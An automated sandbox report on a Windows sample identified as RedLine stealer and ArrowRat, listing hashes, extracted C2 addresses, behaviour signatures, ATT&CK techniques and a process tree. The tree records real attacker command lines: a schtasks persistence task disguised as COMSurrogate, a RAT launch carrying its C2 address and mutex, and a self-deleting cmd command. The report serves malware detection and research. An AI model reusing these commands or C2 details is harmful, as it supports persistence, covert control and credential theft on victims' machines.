Analysis

  • max time kernel
    300s
  • max time network
    93s
  • platform
    windows7_x64
  • resource
    win7-20220812-en
  • resource tags

    arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
  • submitted
    11-11-2022 22:18

General

  • Target

    6c90b6acb49fff4969b5f5fabde4b4fea363e1902ac675ba02e7ad325804b7d4.exe

  • Size

    18.4MB

  • MD5

    464502cbaae7b9ed1cd6da844d38ba86

  • SHA1

    30dd42539cbfad04564f9db45ca40f2b9e81546c

  • SHA256

    6c90b6acb49fff4969b5f5fabde4b4fea363e1902ac675ba02e7ad325804b7d4

  • SHA512

    e74b45702eeaca95bc6c9f2aeea8a5958a425dc1f45ecfb127e286a39eb668243b41e56c705ae5fe7a72ff1ab691948adf29ddd6de18509421fa415647a36b59

  • SSDEEP

    98304:2pgc9WBd2/ojIbrK51bnqvMwqwWhWznbdyxDDFC4B14d+iXLfg0rf2a33OXA7zTg:2pgnBkbYEMUWIzbdyxDDFCXpZU

Malware Config

Extracted

Family

redline

Botnet

@NoxyCloud

C2

85.192.63.57:34210

Attributes
  • auth_value

    20dc074852db65a2b74addf964cf576e

Extracted

Family

arrowrat

Botnet

Client

C2

213.239.219.58:1337

Mutex

nPxRArUjc

Signatures

  • ArrowRat

    Remote access tool with various capabilities first seen in late 2021.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine payload 4 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 3 IoCs
  • Modifies Installed Components in the registry 2 TTPs 1 IoCs
  • Loads dropped DLL 8 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Suspicious use of SetThreadContext 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies registry class 5 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 23 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 18 IoCs
  • Suspicious use of FindShellTrayWindow 27 IoCs
  • Suspicious use of SendNotifyMessage 19 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\6c90b6acb49fff4969b5f5fabde4b4fea363e1902ac675ba02e7ad325804b7d4.exe
    "C:\Users\Admin\AppData\Local\Temp\6c90b6acb49fff4969b5f5fabde4b4fea363e1902ac675ba02e7ad325804b7d4.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1976
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
      2⤵
        PID:1536
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
        2⤵
        • Loads dropped DLL
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:1676
        • C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe
          "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\Invoice.pdf"
          3⤵
          • Suspicious behavior: GetForegroundWindowSpam
          • Suspicious use of SetWindowsHookEx
          PID:968
        • C:\Users\Admin\AppData\Local\Temp\MRH.exe
          "C:\Users\Admin\AppData\Local\Temp\MRH.exe" 0
          3⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:1572
          • C:\Windows\SysWOW64\schtasks.exe
            "C:\Windows\system32\schtasks.exe" /create /tn COMSurrogate /f /sc onlogon /rl highest /tr "C:\Users\Admin\Yisike quoquola fika quaveb\Quoko tace wesa.exe"
            4⤵
            • Creates scheduled task(s)
            PID:1568
          • C:\Users\Admin\Yisike quoquola fika quaveb\Quoko tace wesa.exe
            "C:\Users\Admin\Yisike quoquola fika quaveb\Quoko tace wesa.exe" 0
            4⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of SetThreadContext
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:1380
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
              5⤵
              • Suspicious use of SetThreadContext
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of SetWindowsHookEx
              PID:1588
              • C:\Windows\explorer.exe
                "C:\Windows\explorer.exe"
                6⤵
                • Modifies Installed Components in the registry
                • Modifies registry class
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of FindShellTrayWindow
                • Suspicious use of SendNotifyMessage
                PID:1296
                • C:\Windows\system32\ctfmon.exe
                  ctfmon.exe
                  7⤵
                    PID:1308
                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Client 213.239.219.58 1337 nPxRArUjc
                  6⤵
                    PID:432
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\System32\cmd.exe" /c chcp 65001 && ping 127.0.0.1 && DEL /F /S /Q /A "C:\Users\Admin\AppData\Local\Temp\MRH.exe"
                4⤵
                • Suspicious use of WriteProcessMemory
                PID:1508
                • C:\Windows\SysWOW64\chcp.com
                  chcp 65001
                  5⤵
                    PID:524
                  • C:\Windows\SysWOW64\PING.EXE
                    ping 127.0.0.1
                    5⤵
                    • Runs ping.exe
                    PID:792
              • C:\Users\Admin\AppData\Local\Temp\ROR.exe
                "C:\Users\Admin\AppData\Local\Temp\ROR.exe" 0
                3⤵
                • Suspicious use of NtCreateUserProcessOtherParentProcess
                • Executes dropped EXE
                • Loads dropped DLL
                • Suspicious use of SetThreadContext
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of WriteProcessMemory
                PID:1192
                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                  4⤵
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:296
          • C:\Windows\system32\AUDIODG.EXE
            C:\Windows\system32\AUDIODG.EXE 0x4f0
            1⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:1408

          Network

          MITRE ATT&CK Matrix ATT&CK v6

          Execution

          Scheduled Task

          1
          T1053

          Persistence

          Registry Run Keys / Startup Folder

          1
          T1060

          Scheduled Task

          1
          T1053

          Privilege Escalation

          Scheduled Task

          1
          T1053

          Defense Evasion

          Modify Registry

          1
          T1112

          Credential Access

          Credentials in Files

          1
          T1081

          Discovery

          System Information Discovery

          1
          T1082

          Remote System Discovery

          1
          T1018

          Collection

          Data from Local System

          1
          T1005

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751
            Filesize

            717B

            MD5

            ec8ff3b1ded0246437b1472c69dd1811

            SHA1

            d813e874c2524e3a7da6c466c67854ad16800326

            SHA256

            e634c2d1ed20e0638c95597adf4c9d392ebab932d3353f18af1e4421f4bb9cab

            SHA512

            e967b804cbf2d6da30a532cbc62557d09bd236807790040c6bee5584a482dc09d724fc1d9ac0de6aa5b4e8b1fff72c8ab3206222cc2c95a91035754ac1257552

          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
            Filesize

            61KB

            MD5

            3dcf580a93972319e82cafbc047d34d5

            SHA1

            8528d2a1363e5de77dc3b1142850e51ead0f4b6b

            SHA256

            40810e31f1b69075c727e6d557f9614d5880112895ff6f4df1767e87ae5640d1

            SHA512

            98384be7218340f95dae88d1cb865f23a0b4e12855beb6e74a3752274c9b4c601e493864db777bca677a370d0a9dbffd68d94898a82014537f3a801cce839c42

          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751
            Filesize

            192B

            MD5

            b3a2d174adfa479184f188b2ffced3c7

            SHA1

            a9b821905ffde1d347ac1637c8b8d6373b9289bf

            SHA256

            2c67586682fc077d950eecc2150aa95a58ece3b180697e3d2fefa16031a44e62

            SHA512

            7b7df6be8c0604ab67ae41a4d6118d99d7aa25a0a3e5f90eb5b932343bef279f8ee428c06a010e9d37c7f8a914be72e1359bd5b6d71729b2a9f3d18701579ae6

          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
            Filesize

            342B

            MD5

            bacb66af606588bbb074743079e6381a

            SHA1

            081f3971874bcbe94587a5149983231542bbe4af

            SHA256

            d7563810e069261701951225a826a135d665df84a9e811615a4593e598b0c0fa

            SHA512

            f66a3e982a319c0166b6f113231b92c0ec020203c8147c650601fb6e04bb9265d3543be526696f5c9db8d75830d80e63097dd75732c516b37898def095014f65

          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
            Filesize

            342B

            MD5

            efc8ca2af23bf0209a4f7700a861fcf8

            SHA1

            075c7a6c8cd7b82c604d0a6fb2df0ea3900adab7

            SHA256

            d3948ab167cbf8868228ff0f682e44d3c7c0041ebb38e51fa41865dc5810269d

            SHA512

            8d9f327cff90e089291ee0de82b9c3a3287de26d24f5a5de26da6258a9af3dcfa16915df6dea2a9a9cd85ff38754dc77dc2072c6540d0ac856320da5ccf8ee35

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\GTUA22LQ\library[1].bin
            Filesize

            259KB

            MD5

            94aafe6b249b7f529f9d66a6f7d0b80e

            SHA1

            a83eee4aa9c936a8e423c4b2b7d2b1036a9a0c44

            SHA256

            41c631caa7c9e95166917bec39627c488400d180622e4b2bb3a3629732692b54

            SHA512

            e94befd6c2462bbab13e0e66569c78d34d075f15a9923713f9e72bbd7f791103ef20161b7f830a9ad1f2745ccd9e60bbbe7540f87c025d3be4b0dba3d546d5cb

          • C:\Users\Admin\AppData\Local\Temp\Invoice.pdf
            Filesize

            163KB

            MD5

            5441d36f8dcfdd31e75562b380bea7a8

            SHA1

            70053ce7491743efacaa4b40f452efb3f32df4e8

            SHA256

            58098a6f25d3fb423b49a97cf917a406c5841d7ac792ef04ecb9646f5629baf3

            SHA512

            06a19ace54e2ccb25faaba3dce7a4b72010d1002efbd5d3e1cab1f23493dd8ada55803e9cd695a79c6030204224a84c5192b334b2e8c1007713e1f472f645bbe

          • C:\Users\Admin\AppData\Local\Temp\MRH.exe
            Filesize

            1.9MB

            MD5

            18585735c8866b21e2723a6f020bafd0

            SHA1

            afb5b2c9d5ca57501835b0c56fd97b0641f01d88

            SHA256

            e9c817d02acaf2fbb59a0a44be05dbb284ee622f50b2e2a598daac8bfb564672

            SHA512

            88516af4bbbd9562a9ae9840124c6f9f1402f9a15a0ace5e2413023bbd80c37aa441cc39b8b48f8ca58f4192273e16cd590cd2e9e9a4298f6ed5b0497d54e6b8

          • C:\Users\Admin\AppData\Local\Temp\MRH.exe
            Filesize

            1.9MB

            MD5

            18585735c8866b21e2723a6f020bafd0

            SHA1

            afb5b2c9d5ca57501835b0c56fd97b0641f01d88

            SHA256

            e9c817d02acaf2fbb59a0a44be05dbb284ee622f50b2e2a598daac8bfb564672

            SHA512

            88516af4bbbd9562a9ae9840124c6f9f1402f9a15a0ace5e2413023bbd80c37aa441cc39b8b48f8ca58f4192273e16cd590cd2e9e9a4298f6ed5b0497d54e6b8

          • C:\Users\Admin\AppData\Local\Temp\ROR.exe
            Filesize

            1.7MB

            MD5

            85ea4565608d2f6c35decb6ed8547749

            SHA1

            e15ae6c93c9e998b030609fdf4b3274925694229

            SHA256

            f6706aafbeb4e8e10478bb1fd5b171e2f7f13399416344aba46233593e6f5d69

            SHA512

            762b5e5293067c484ca54fa297f5770217275a7594083b64b15ed65955f64ba158bbf58a7713419c2dc15d265a7bf8c85b4f11c8fd27e62ba21f429493df4dd5

          • C:\Users\Admin\AppData\Local\Temp\advapi32.exe
            Filesize

            382KB

            MD5

            3e68a0b08bf963d889f8ba04bfda9f89

            SHA1

            a762dec43d514b11fd2b01acf19b820a1e65a1ad

            SHA256

            4287d8fc2a015071dd83487a66488c32dfe36f77693a71c1c7c07fb1b3afad52

            SHA512

            bc31c7d0248a7a0149f936b3d985137ed1380dd70214bc5781d0a71c2d3a967455c8db18a2e118a2a8ed43a2c6ea6cd3491f7e1435e78def5ad723dd9dfe6367

          • C:\Users\Admin\Yisike quoquola fika quaveb\Quoko tace wesa.exe
            Filesize

            757.9MB

            MD5

            50542fe18c48cfa1d4bd55151e03c135

            SHA1

            c504ca379986267a32e38200376a5e4f4a36106a

            SHA256

            113151c2338383f4155ce11b9cac6fd70dd9e8cb8b298fe4db9fdfc2a369d93b

            SHA512

            f9b3740a16eda270a7938533d171495530e04048304e5c164587e1cb5c8802d2ca48d90bafbcc57bda481cf2b5d966e535a08f091117a0c0a9a4d24801e9b3c6

          • \Users\Admin\AppData\Local\Temp\MRH.exe
            Filesize

            1.9MB

            MD5

            18585735c8866b21e2723a6f020bafd0

            SHA1

            afb5b2c9d5ca57501835b0c56fd97b0641f01d88

            SHA256

            e9c817d02acaf2fbb59a0a44be05dbb284ee622f50b2e2a598daac8bfb564672

            SHA512

            88516af4bbbd9562a9ae9840124c6f9f1402f9a15a0ace5e2413023bbd80c37aa441cc39b8b48f8ca58f4192273e16cd590cd2e9e9a4298f6ed5b0497d54e6b8

          • \Users\Admin\AppData\Local\Temp\MRH.exe
            Filesize

            1.9MB

            MD5

            18585735c8866b21e2723a6f020bafd0

            SHA1

            afb5b2c9d5ca57501835b0c56fd97b0641f01d88

            SHA256

            e9c817d02acaf2fbb59a0a44be05dbb284ee622f50b2e2a598daac8bfb564672

            SHA512

            88516af4bbbd9562a9ae9840124c6f9f1402f9a15a0ace5e2413023bbd80c37aa441cc39b8b48f8ca58f4192273e16cd590cd2e9e9a4298f6ed5b0497d54e6b8

          • \Users\Admin\AppData\Local\Temp\ROR.exe
            Filesize

            1.7MB

            MD5

            85ea4565608d2f6c35decb6ed8547749

            SHA1

            e15ae6c93c9e998b030609fdf4b3274925694229

            SHA256

            f6706aafbeb4e8e10478bb1fd5b171e2f7f13399416344aba46233593e6f5d69

            SHA512

            762b5e5293067c484ca54fa297f5770217275a7594083b64b15ed65955f64ba158bbf58a7713419c2dc15d265a7bf8c85b4f11c8fd27e62ba21f429493df4dd5

          • \Users\Admin\AppData\Local\Temp\ROR.exe
            Filesize

            1.7MB

            MD5

            85ea4565608d2f6c35decb6ed8547749

            SHA1

            e15ae6c93c9e998b030609fdf4b3274925694229

            SHA256

            f6706aafbeb4e8e10478bb1fd5b171e2f7f13399416344aba46233593e6f5d69

            SHA512

            762b5e5293067c484ca54fa297f5770217275a7594083b64b15ed65955f64ba158bbf58a7713419c2dc15d265a7bf8c85b4f11c8fd27e62ba21f429493df4dd5

          • \Users\Admin\AppData\Local\Temp\advapi32.dll
            Filesize

            262KB

            MD5

            1b51fec95f5403305749c4bcb3485b14

            SHA1

            f4974196213a94911c850504924f38cd9e7fe889

            SHA256

            3c0d3f9a776c503eca4e0a014006fe1a8f53e5e22138f6add9e45ad0fbf8844e

            SHA512

            6e8aa862cb2d95fe67c212de2ee59f903a3de6e16bdd87918e31bc2d7de9a1bdd61f756f1bdf35aa41c7e3620650b9ad9bbaa65487d7152fdf7420767a91e90d

          • \Users\Admin\AppData\Local\Temp\advapi32.exe
            Filesize

            382KB

            MD5

            3e68a0b08bf963d889f8ba04bfda9f89

            SHA1

            a762dec43d514b11fd2b01acf19b820a1e65a1ad

            SHA256

            4287d8fc2a015071dd83487a66488c32dfe36f77693a71c1c7c07fb1b3afad52

            SHA512

            bc31c7d0248a7a0149f936b3d985137ed1380dd70214bc5781d0a71c2d3a967455c8db18a2e118a2a8ed43a2c6ea6cd3491f7e1435e78def5ad723dd9dfe6367

          • \Users\Admin\Yisike quoquola fika quaveb\Quoko tace wesa.exe
            Filesize

            757.9MB

            MD5

            50542fe18c48cfa1d4bd55151e03c135

            SHA1

            c504ca379986267a32e38200376a5e4f4a36106a

            SHA256

            113151c2338383f4155ce11b9cac6fd70dd9e8cb8b298fe4db9fdfc2a369d93b

            SHA512

            f9b3740a16eda270a7938533d171495530e04048304e5c164587e1cb5c8802d2ca48d90bafbcc57bda481cf2b5d966e535a08f091117a0c0a9a4d24801e9b3c6

          • \Users\Admin\Yisike quoquola fika quaveb\Quoko tace wesa.exe
            Filesize

            757.9MB

            MD5

            50542fe18c48cfa1d4bd55151e03c135

            SHA1

            c504ca379986267a32e38200376a5e4f4a36106a

            SHA256

            113151c2338383f4155ce11b9cac6fd70dd9e8cb8b298fe4db9fdfc2a369d93b

            SHA512

            f9b3740a16eda270a7938533d171495530e04048304e5c164587e1cb5c8802d2ca48d90bafbcc57bda481cf2b5d966e535a08f091117a0c0a9a4d24801e9b3c6

          • memory/296-124-0x0000000000400000-0x0000000000428000-memory.dmp
            Filesize

            160KB

          • memory/296-117-0x0000000000400000-0x0000000000428000-memory.dmp
            Filesize

            160KB

          • memory/296-119-0x0000000000400000-0x0000000000428000-memory.dmp
            Filesize

            160KB

          • memory/296-122-0x0000000000400000-0x0000000000428000-memory.dmp
            Filesize

            160KB

          • memory/432-146-0x0000000000400000-0x0000000000418000-memory.dmp
            Filesize

            96KB

          • memory/432-153-0x0000000000400000-0x0000000000418000-memory.dmp
            Filesize

            96KB

          • memory/432-151-0x0000000000400000-0x0000000000418000-memory.dmp
            Filesize

            96KB

          • memory/432-149-0x000000000041262E-mapping.dmp
          • memory/432-148-0x0000000000400000-0x0000000000418000-memory.dmp
            Filesize

            96KB

          • memory/432-147-0x0000000000400000-0x0000000000418000-memory.dmp
            Filesize

            96KB

          • memory/432-144-0x0000000000400000-0x0000000000418000-memory.dmp
            Filesize

            96KB

          • memory/432-143-0x0000000000400000-0x0000000000418000-memory.dmp
            Filesize

            96KB

          • memory/524-110-0x0000000000000000-mapping.dmp
          • memory/792-111-0x0000000000000000-mapping.dmp
          • memory/968-68-0x0000000000000000-mapping.dmp
          • memory/1192-116-0x0000000002380000-0x0000000002B1D000-memory.dmp
            Filesize

            7.6MB

          • memory/1192-91-0x0000000000750000-0x00000000008D1000-memory.dmp
            Filesize

            1.5MB

          • memory/1192-89-0x0000000000750000-0x00000000008D1000-memory.dmp
            Filesize

            1.5MB

          • memory/1192-88-0x0000000002380000-0x0000000002B1D000-memory.dmp
            Filesize

            7.6MB

          • memory/1192-87-0x0000000002380000-0x0000000002B1D000-memory.dmp
            Filesize

            7.6MB

          • memory/1192-108-0x000000000EA90000-0x000000000EC04000-memory.dmp
            Filesize

            1.5MB

          • memory/1192-100-0x000000000EA90000-0x000000000EC04000-memory.dmp
            Filesize

            1.5MB

          • memory/1192-121-0x0000000000750000-0x00000000008D1000-memory.dmp
            Filesize

            1.5MB

          • memory/1192-84-0x0000000000000000-mapping.dmp
          • memory/1296-142-0x000007FEFC511000-0x000007FEFC513000-memory.dmp
            Filesize

            8KB

          • memory/1296-156-0x0000000002770000-0x0000000002780000-memory.dmp
            Filesize

            64KB

          • memory/1296-141-0x0000000000000000-mapping.dmp
          • memory/1308-154-0x0000000000000000-mapping.dmp
          • memory/1380-130-0x0000000010E10000-0x0000000010FFF000-memory.dmp
            Filesize

            1.9MB

          • memory/1380-128-0x0000000010E10000-0x0000000010FFF000-memory.dmp
            Filesize

            1.9MB

          • memory/1380-112-0x00000000026F0000-0x00000000028B7000-memory.dmp
            Filesize

            1.8MB

          • memory/1380-114-0x00000000026F0000-0x00000000028B7000-memory.dmp
            Filesize

            1.8MB

          • memory/1380-136-0x00000000026F0000-0x00000000028B7000-memory.dmp
            Filesize

            1.8MB

          • memory/1380-109-0x0000000001DF0000-0x00000000026E5000-memory.dmp
            Filesize

            9.0MB

          • memory/1380-105-0x0000000001DF0000-0x00000000026E5000-memory.dmp
            Filesize

            9.0MB

          • memory/1380-103-0x0000000000000000-mapping.dmp
          • memory/1380-129-0x0000000010680000-0x000000001073F000-memory.dmp
            Filesize

            764KB

          • memory/1508-106-0x0000000000000000-mapping.dmp
          • memory/1568-96-0x0000000000000000-mapping.dmp
          • memory/1572-79-0x00000000028B0000-0x0000000002A77000-memory.dmp
            Filesize

            1.8MB

          • memory/1572-99-0x00000000028B0000-0x0000000002A77000-memory.dmp
            Filesize

            1.8MB

          • memory/1572-77-0x00000000028B0000-0x0000000002A77000-memory.dmp
            Filesize

            1.8MB

          • memory/1572-76-0x0000000001FB0000-0x00000000028A5000-memory.dmp
            Filesize

            9.0MB

          • memory/1572-75-0x0000000001FB0000-0x00000000028A5000-memory.dmp
            Filesize

            9.0MB

          • memory/1572-73-0x0000000000000000-mapping.dmp
          • memory/1572-107-0x00000000028B0000-0x0000000002A77000-memory.dmp
            Filesize

            1.8MB

          • memory/1572-97-0x0000000001FB0000-0x00000000028A5000-memory.dmp
            Filesize

            9.0MB

          • memory/1588-132-0x0000000000400000-0x000000000042C000-memory.dmp
            Filesize

            176KB

          • memory/1588-134-0x0000000000400000-0x000000000042C000-memory.dmp
            Filesize

            176KB

          • memory/1588-137-0x0000000000400000-0x000000000042C000-memory.dmp
            Filesize

            176KB

          • memory/1588-139-0x0000000000400000-0x000000000042C000-memory.dmp
            Filesize

            176KB

          • memory/1676-60-0x0000000000400000-0x0000000000405000-memory.dmp
            Filesize

            20KB

          • memory/1676-63-0x0000000000400000-0x0000000000405000-memory.dmp
            Filesize

            20KB

          • memory/1676-56-0x0000000000400000-0x0000000000405000-memory.dmp
            Filesize

            20KB

          • memory/1676-57-0x0000000000400000-0x0000000000405000-memory.dmp
            Filesize

            20KB

          • memory/1676-66-0x0000000075CF1000-0x0000000075CF3000-memory.dmp
            Filesize

            8KB

          • memory/1676-67-0x0000000000400000-0x0000000000405000-memory.dmp
            Filesize

            20KB

          • memory/1676-86-0x0000000000400000-0x0000000000405000-memory.dmp
            Filesize

            20KB

          • memory/1676-61-0x000000000040106C-mapping.dmp
          • memory/1676-59-0x0000000000400000-0x0000000000405000-memory.dmp
            Filesize

            20KB

          • memory/1676-78-0x0000000000400000-0x0000000000405000-memory.dmp
            Filesize

            20KB

          • memory/1976-54-0x0000000000BD0000-0x0000000001E3A000-memory.dmp
            Filesize

            18.4MB

          • memory/1976-55-0x000000001C340000-0x000000001C4D0000-memory.dmp
            Filesize

            1.6MB